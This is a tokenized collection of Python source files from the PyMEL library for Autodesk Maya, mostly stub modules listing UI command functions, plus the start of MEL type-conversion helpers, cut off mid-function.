pymel . core . language import isValidMelType <EOL> from pymel . core . language import getMelType <EOL> from pymel . core . language import conditionExists <EOL> from pymel . core . language import OptionVarList <EOL> from pymel . core . language import MelUnknownProcedureError <EOL> from pymel . core . language import getLastError <EOL> from pymel . core . language import MelArgumentError <EOL> from pymel . core . language import evalEcho <EOL> from pymel . core . language import getMelGlobal <EOL> from pymel . core . language import OptionVarDict <EOL> from pymel . core . language import MelGlobals <EOL> from pymel . core . language import scriptJob <EOL> from pymel . core . language import python <EOL> from pymel . core . language import pythonToMelCmd <EOL> from pymel . core . language import MelSyntaxError <EOL> from pymel . core . language import setMelGlobal <EOL> from pymel . core . language import waitCursor <EOL> def updateSoftBodyUI ( nodeName ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> MELTYPES = [ ] <EOL> optionVar = { } <EOL> catch = None <EOL> env = None <EOL> logger = None </s>
<s> import maya . OpenMaya as OpenMaya <EOL> import maya . cmds as cmds <EOL> import sys <EOL> import maya . OpenMayaMPx as OpenMayaMPx <EOL> import unittest <EOL> class testCallbackStrings ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def testFileNewCheckCallback ( self ) : <EOL> pass <EOL> def testFileNewCheckCallbackAllow ( self ) : <EOL> pass <EOL> def testFileNewCheckCallbackStop ( self ) : <EOL> pass <EOL> def testFileOpenFileqCheckCallback ( self ) : <EOL> pass <EOL> def testBeforeOpenFileCheckCallback ( retCode , fileObject , clientData ) : <EOL> pass <EOL> def testBeforeNewCheckCallback ( retCode , clientData ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def testBeforeNewCheckCallbackStop ( retCode , clientData ) : <EOL> pass <EOL> def testBeforeNewCheckCallbackAllow ( retCode , clientData ) : <EOL> pass <EOL> gCallbackName = None </s>
<s> import exceptions <EOL> import pymel . internal . pmcmds as cmds <EOL> import traceback <EOL> import pymel . versions as _versions <EOL> import re <EOL> import pymel . internal as _internal <EOL> import pymel . util as _util <EOL> import functools <EOL> import pymel . internal . factories as _factories <EOL> import sys <EOL> from pymel . internal . factories import CallbackWithArgs <EOL> from pymel . core . uitypes import toQtLayout <EOL> from pymel . core . uitypes import toQtWindow <EOL> from pymel . internal . factories import Callback <EOL> from pymel . core . system import Path as _Path <EOL> from pymel . core . uitypes import toQtObject <EOL> from pymel . core . uitypes import objectTypeUI <EOL> from pymel . core . uitypes import toQtControl <EOL> from pymel . core . uitypes import toQtMenuItem <EOL> class PopupError ( exceptions . Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , msg , * args , ** kwargs ) : <EOL> pass <EOL> def __new__ ( cls , msgOrException , title = '<STR_LIT>' , button = '<STR_LIT>' , msg = None , icon = '<STR_LIT>' ) : <EOL> pass <EOL> __weakref__ = None <EOL> def dynPaintEditor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def refreshEditorTemplates ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def hyperGraph ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def messageLine ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def toolBar ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def attrFieldSliderGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def commandLine ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def nameCommand ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def setStartupMessage ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def menuSetPref ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def webBrowser ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def intField ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def editorTemplate ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def confirmDialog ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def iconTextRadioButton ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def hyperPanel ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def getPanel ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def progressBar ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def floatSliderGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def toggleWindowVisibility ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def nodeOutliner ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def overrideModifier ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def uiTemplate ( name = None , force = False , exists = None ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def modelPanel ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def loadPrefObjects ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def nameField ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def intScrollBar ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def modelEditor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def textField ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def _lsUI ( ** kwargs ) : <EOL> pass <EOL> def textFieldButtonGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def separator ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def hyperShade ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def rowLayout ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def clipEditor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def floatFieldGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def rowColumnLayout ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def textCurves ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def promptForFolder ( ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def devicePanel ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def autoPlace ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def shelfTabLayout ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def layout ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def intFieldGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def animCurveEditor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def hudButton ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def panel ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def attrColorSliderGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def timePort ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def cmdShell ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def palettePort ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def shelfButton ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def checkBox ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def saveShelf ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def formLayout ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def hotBox ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def radioButtonGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def _createClassCommands ( ) : <EOL> pass <EOL> def setNodeTypeFlag ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def defaultLightListCheckBox ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def linearPrecision ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def iconTextCheckBox ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def visor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def helpLine ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def subMenuItem ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def cmdScrollFieldReporter ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def defaultNavigation ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def scrollLayout ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def gradientControl ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def progressWindow ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def toolCollection ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def intSliderGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def scriptTable ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def attributeMenu ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def saveViewportSettings ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def disable ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def intSlider ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def minimizeApp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def runTimeCommand ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def renameUI ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def hotkey ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def swatchDisplayPort ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def _findLongName ( name , type = None ) : <EOL> pass <EOL> def flowLayout ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def menuSet ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def promptBoxGenerator ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def iconTextStaticLabel ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def animDisplay ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def editor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def treeLister ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def gridLayout ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def webBrowserPrefs ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def cmdScrollFieldExecuter ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def textScrollList ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def radioMenuItemCollection ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def attrFieldGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def shelfLayout ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def setUITemplate ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def attrControlGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def colorIndexSliderGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def optionMenuGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def keyframeStats ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def nodeEditor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def text ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def annotate ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def menuBarLayout ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def valueControlGrp ( name = None , create = False , dataType = None , slider = True , value = None , numberOfControls = <NUM_LIT:1> , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def layerButton ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def gradientControlNoAttr ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def clipSchedulerOutliner ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def radioButton ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def frameLayout ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def window ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def currentParent ( ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def getMainProgressBar ( ) : <EOL> pass <EOL> def _createOtherCommands ( ) : <EOL> pass <EOL> def confirmBox ( title , message , yes = '<STR_LIT>' , no = '<STR_LIT>' , * moreButtons , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def scmh ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def symbolCheckBox ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def setMenuMode ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def renderWindowEditor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def panelHistory ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def componentEditor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def nodeIconButton ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def promptForPath ( ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def scrollField ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def attrEnumOptionMenu ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def fontDialog ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def dockControl ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def soundControl ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def picture ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def hardwareRenderPanel ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def showWindow ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def symbolButton ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def panelConfiguration ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def iconTextRadioCollection ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def menuItem ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def floatSliderButtonGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def iconTextScrollList ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def blendShapeEditor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def keyframeOutliner ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def radioCollection ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def colorSliderButtonGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def channelBox ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def saveMenu ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def inViewMessage ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def iconTextButton ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def rangeControl ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def floatSlider2 ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def textFieldGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def lsUI ( ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def windowPref ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def optionMenu ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def showsHourglass ( func ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def dimWhen ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def toolButton ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def tabLayout ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def button ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def colorEditor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def folderButtonGrp ( name = None , * args , ** kwargs ) : <EOL> pass <EOL> def image ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def hudSliderButton ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def scriptedPanelType ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def floatSlider ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def outlinerEditor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def pathButtonGrp ( name = None , * args , ** kwargs ) : <EOL> pass <EOL> def attrEnumOptionMenuGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def attrNavigationControlGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def deviceEditor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def nodeTreeLister ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def headsUpDisplay ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def floatField ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def informBox ( title , message , ok = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def loadUI ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def autoLayout ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def deleteUI ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def viewManip ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def outlinerPanel ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def showSelectionInTitle ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def floatScrollBar ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def paneLayout ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def colorSliderGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def verticalLayout ( * args , ** kwargs ) : <EOL> pass <EOL> def hotkeyCheck ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def vectorFieldGrp ( * args , ** kwargs ) : <EOL> pass <EOL> def grabColor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def scriptedPanel ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def textManip ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def control ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def layoutDialog ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def savePrefObjects ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def connectControl ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def menu ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def treeView ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def promptBox ( title , message , okText , cancelText , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def setFocus ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def scriptEditorInfo ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def saveAllShelves ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def setParent ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def createEditor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def headsUpMessage ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def exclusiveLightCheckBox ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def hudSlider ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def blendShapePanel ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def componentBox ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def fileDialog ( * args , ** kwargs ) : <EOL> pass <EOL> def buttonManip ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def promptDialog ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def columnLayout ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def switchTable ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def popupMenu ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def checkBoxGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def glRenderEditor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def menuEditor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def currentMenuParent ( ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def spreadSheetEditor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def canvas ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def timeControl ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def horizontalLayout ( * args , ** kwargs ) : <EOL> pass <EOL> def artBuildPaintMenu ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> _logger = None <EOL> melGlobals = { } <EOL> thisModuleCmd = "<STR_LIT>" <EOL> scriptTableCmds = { } <EOL> mel = None <EOL> _commandsToUITypes = { } </s>
<s> """<STR_LIT>""" <EOL> class Condition ( object ) : <EOL> """<STR_LIT>""" <EOL> def __and__ ( self , other ) : <EOL> pass <EOL> def __init__ ( self , value = None ) : <EOL> pass <EOL> def __invert__ ( self ) : <EOL> pass <EOL> def __nonzero__ ( self ) : <EOL> pass <EOL> def __or__ ( self , other ) : <EOL> pass <EOL> def __rand__ ( self , other ) : <EOL> pass <EOL> def __ror__ ( self , other ) : <EOL> pass <EOL> def __str__ ( self ) : <EOL> pass <EOL> def eval ( self , data = "<STR_LIT>" ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> NO_DATA = None <EOL> class AndOrAbstract ( Condition ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __str__ ( self ) : <EOL> pass <EOL> def eval ( self , data = "<STR_LIT>" ) : <EOL> pass <EOL> class Inverse ( Condition ) : <EOL> def __init__ ( self , toInvert ) : <EOL> pass <EOL> def __str__ ( self ) : <EOL> pass <EOL> def eval ( self , data = "<STR_LIT>" ) : <EOL> pass <EOL> class Or ( AndOrAbstract ) : <EOL> pass <EOL> class And ( AndOrAbstract ) : <EOL> pass <EOL> Always = Condition ( ) <EOL> Never = Condition ( ) </s>
<s> """<STR_LIT>""" <EOL> import sys , os , inspect <EOL> from getpass import getuser as _getuser <EOL> import system <EOL> import maya . mel as _mm <EOL> import maya . cmds as _mc <EOL> import pymel . util as util <EOL> import pymel . internal . pmcmds as cmds <EOL> import pymel . internal . factories as _factories <EOL> import pymel . internal . cmdcache as _cmdcache <EOL> import pymel . api as _api <EOL> import datatypes <EOL> MELTYPES = [ '<STR_LIT:string>' , '<STR_LIT>' , '<STR_LIT:int>' , '<STR_LIT>' , '<STR_LIT:float>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def isValidMelType ( typStr ) : <EOL> """<STR_LIT>""" <EOL> return typStr in MELTYPES <EOL> def _flatten ( iterables ) : <EOL> for it in iterables : <EOL> if util . isIterable ( it ) : <EOL> for element in it : <EOL> yield element <EOL> else : <EOL> yield it <EOL> def pythonToMel ( arg ) : <EOL> """<STR_LIT>""" <EOL> if arg is None : <EOL> return '<STR_LIT>' <EOL> if arg is True or arg is False : <EOL> return str ( arg ) . lower ( ) <EOL> if util . isNumeric ( arg ) : <EOL> return str ( arg ) <EOL> if isinstance ( arg , datatypes . Vector ) : <EOL> return '<STR_LIT>' % ( arg [ <NUM_LIT:0> ] , arg [ <NUM_LIT:1> ] , arg [ <NUM_LIT:2> ] ) <EOL> if util . isIterable ( arg ) : <EOL> if util . isMapping ( arg ) : <EOL> arg = list ( _flatten ( arg . iteritems ( ) ) ) <EOL> else : <EOL> arg = list ( _flatten ( arg ) ) <EOL> forceString = False <EOL> for each in arg : <EOL> if not util . isNumeric ( each ) : <EOL> forceString = True <EOL> break <EOL> if forceString : <EOL> newargs = [ '<STR_LIT>' % x for x in arg ] <EOL> else : <EOL> newargs = [ str ( x ) for x in arg ] <EOL> return '<STR_LIT>' % '<STR_LIT:U+002C>' . join ( newargs ) <EOL> return '<STR_LIT>' % cmds . encodeString ( str ( arg ) ) <EOL> def pythonToMelCmd ( command , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> strArgs = [ pythonToMel ( arg ) for arg in args ] <EOL> if kwargs : <EOL> strFlags = [ ] <EOL> if command in _factories . cmdlist : <EOL> flags = _factories . cmdlist [ command ] [ '<STR_LIT>' ] <EOL> shortFlags = _factories . cmdlist [ command ] [ '<STR_LIT>' ] <EOL> else : <EOL> flags = { } <EOL> shortFlags = { } <EOL> for key , val in kwargs . iteritems ( ) : <EOL> flagInfo = None <EOL> if key in flags : <EOL> flagInfo = flags [ key ] <EOL> elif key in shortFlags : <EOL> flagInfo = flags [ shortFlags [ key ] ] <EOL> if ( flagInfo and flagInfo . get ( '<STR_LIT:args>' ) == bool <EOL> and flagInfo . get ( '<STR_LIT>' ) == <NUM_LIT:0> ) : <EOL> strFlags . append ( '<STR_LIT>' % key ) <EOL> elif ( isinstance ( val , ( tuple , list ) ) <EOL> and len ( val ) == flagInfo . get ( '<STR_LIT>' ) ) : <EOL> strFlags . append ( '<STR_LIT>' % ( key , '<STR_LIT:U+0020>' . join ( pythonToMel ( x ) for x in val ) ) ) <EOL> else : <EOL> strFlags . append ( '<STR_LIT>' % ( key , pythonToMel ( val ) ) ) <EOL> cmdStr = '<STR_LIT>' % ( command , '<STR_LIT:U+0020>' . join ( strFlags ) , '<STR_LIT:U+0020>' . join ( strArgs ) ) <EOL> else : <EOL> cmdStr = '<STR_LIT>' % ( command , '<STR_LIT:U+002C>' . join ( strArgs ) ) <EOL> return cmdStr <EOL> def getMelType ( pyObj , exactOnly = True , allowBool = False , allowMatrix = False ) : <EOL> """<STR_LIT>""" <EOL> if inspect . isclass ( pyObj ) : <EOL> if issubclass ( pyObj , basestring ) : return '<STR_LIT:string>' <EOL> elif allowBool and issubclass ( pyObj , bool ) : return '<STR_LIT:bool>' <EOL> elif issubclass ( pyObj , int ) : return '<STR_LIT:int>' <EOL> elif issubclass ( pyObj , float ) : return '<STR_LIT:float>' <EOL> elif issubclass ( pyObj , datatypes . VectorN ) : return '<STR_LIT>' <EOL> elif issubclass ( pyObj , datatypes . MatrixN ) : <EOL> if allowMatrix : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return '<STR_LIT>' <EOL> elif not exactOnly : <EOL> return pyObj . __name__ <EOL> else : <EOL> if isinstance ( pyObj , datatypes . VectorN ) : return '<STR_LIT>' <EOL> elif isinstance ( pyObj , datatypes . MatrixN ) : <EOL> if allowMatrix : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return '<STR_LIT>' <EOL> elif util . isIterable ( pyObj ) : 